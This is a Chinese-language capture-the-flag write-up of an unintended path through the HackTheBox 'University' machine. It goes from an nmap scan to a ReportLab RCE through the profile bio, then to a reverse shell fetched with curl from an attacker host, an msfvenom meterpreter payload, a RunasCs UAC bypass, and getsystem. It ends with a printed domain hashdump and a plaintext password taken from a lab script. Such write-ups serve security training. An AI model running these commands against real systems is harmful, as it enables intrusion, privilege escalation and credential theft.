University - HackTheBox - 非预期

基本信息

• https://app.hackthebox.com/machines/University
• 10.10.11.39

端口扫描

80和常规域端口：

$ nmap -sC -sV -Pn 10.10.11.39
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-28 13:32 CST
Nmap scan report for 10.10.11.39
Host is up (0.076s latency).
Not shown: 986 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://university.htb/
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-28 12:20:26Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2179/tcp open  vmrdp?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-10-28T12:20:47
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 6h47m38s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.17 seconds

80

需要加hosts：

10.10.11.39 university.htb

在线教育相关的：

university

注册有两类账号，professor账号需要审核，所以先注册学生账号测试：

profile export

右上角有个profile export选项，导出profile为pdf,解析发现使用REPORTLAB处理的pdf：

• DidierStevensSuite/pdf-parser.py at master · DidierStevens/DidierStevensSuite
  https://github.com/DidierStevens/DidierStevensSuite/blob/master/pdf-parser.py

ReportLab

搜索可以发现ReportLab相关漏洞：

• c53elyas/CVE-2023-33733: CVE-2023-33733 reportlab RCE
  https://github.com/c53elyas/CVE-2023-33733

测试更新profile，BIO中放置payload，然后export成功触发命令执行：

reverse shell

简单的shell分两步执行，得到wao用户：

curl http://10.10.14.9:7777/shell.ps1 -o shell.ps1
powershell ./shell.ps1

WAO

然后常规翻文件，db-backup-automator.ps1中得到wao用户密码：

WebAO1337

之后使用得到的wao账号密码获取bypass uac的shell：

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=4444 -f exe -o miao.exe

curl http://10.10.14.9:7777/miao.exe -o miao.exe
curl http://10.10.14.9:7777/RunasCs.exe -o RunasCs.exe

.\RunasCs.exe wao WebAO1337 miao.exe -l 5 --bypass-uac

非预期提权 & flags

wao用户有SeImpersonatePrivilege，直接getsystem：

user flag在John.D桌面

hashdump

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e63413bab01a0b8820983496c0be3a9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:41c4599e48661690fa6538fe96d366de:::
John.D:1103:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
George.A:1104:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
WAO:1106:aad3b435b51404eeaad3b435b51404ee:da49675b9d3d5e403fa3c1c6b5c3f5a2:::
hana:1107:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
karma.watterson:1108:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Alice.Z:1109:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Steven.P:1110:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Karol.J:1111:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Leon.K:1112:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
A.Crouz:1113:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Kai.K:1114:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Arnold.G:1115:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Kareem.A:1116:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Lisa.K:1117:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Jakken.C:1118:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Nya.R:1119:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Brose.W:1120:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Choco.L:1121:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Rose.L:1122:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Emma.H:1123:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
C.Freez:1124:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Martin.T:1127:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
William.B:1132:aad3b435b51404eeaad3b435b51404ee:a910f374f7e63717f112fb4e40122a7c:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:2522eb84c83b5e9ffde18045be5b9e59:::
WS-3$:1134:aad3b435b51404eeaad3b435b51404ee:b51c7661e82feb147afffb324d91af34:::
GMSA-PClient01$:1140:aad3b435b51404eeaad3b435b51404ee:e5799ed7c404dead98cbe2fc610b9b1f:::
WS-1$:1141:aad3b435b51404eeaad3b435b51404ee:c23b84b12d7f2c758e4ca7da5b053c81:::
WS-2$:1142:aad3b435b51404eeaad3b435b51404ee:bfd5d3a7883cb6e0a63a29d0cdfd430c:::
WS-4$:1143:aad3b435b51404eeaad3b435b51404ee:c591cf4bcad09cc0eb5ba2b54e58b217:::
WS-5$:1144:aad3b435b51404eeaad3b435b51404ee:7427ac9458a4a39f5076ab080b1329b3:::
LAB-2$:1145:aad3b435b51404eeaad3b435b51404ee:93b3bf5940c921c6f072961d10c3f43f:::
meterpreter >

参考资料

• DidierStevensSuite/pdf-parser.py at master · DidierStevens/DidierStevensSuite
  https://github.com/DidierStevens/DidierStevensSuite/blob/master/pdf-parser.py
• c53elyas/CVE-2023-33733: CVE-2023-33733 reportlab RCE
  https://github.com/c53elyas/CVE-2023-33733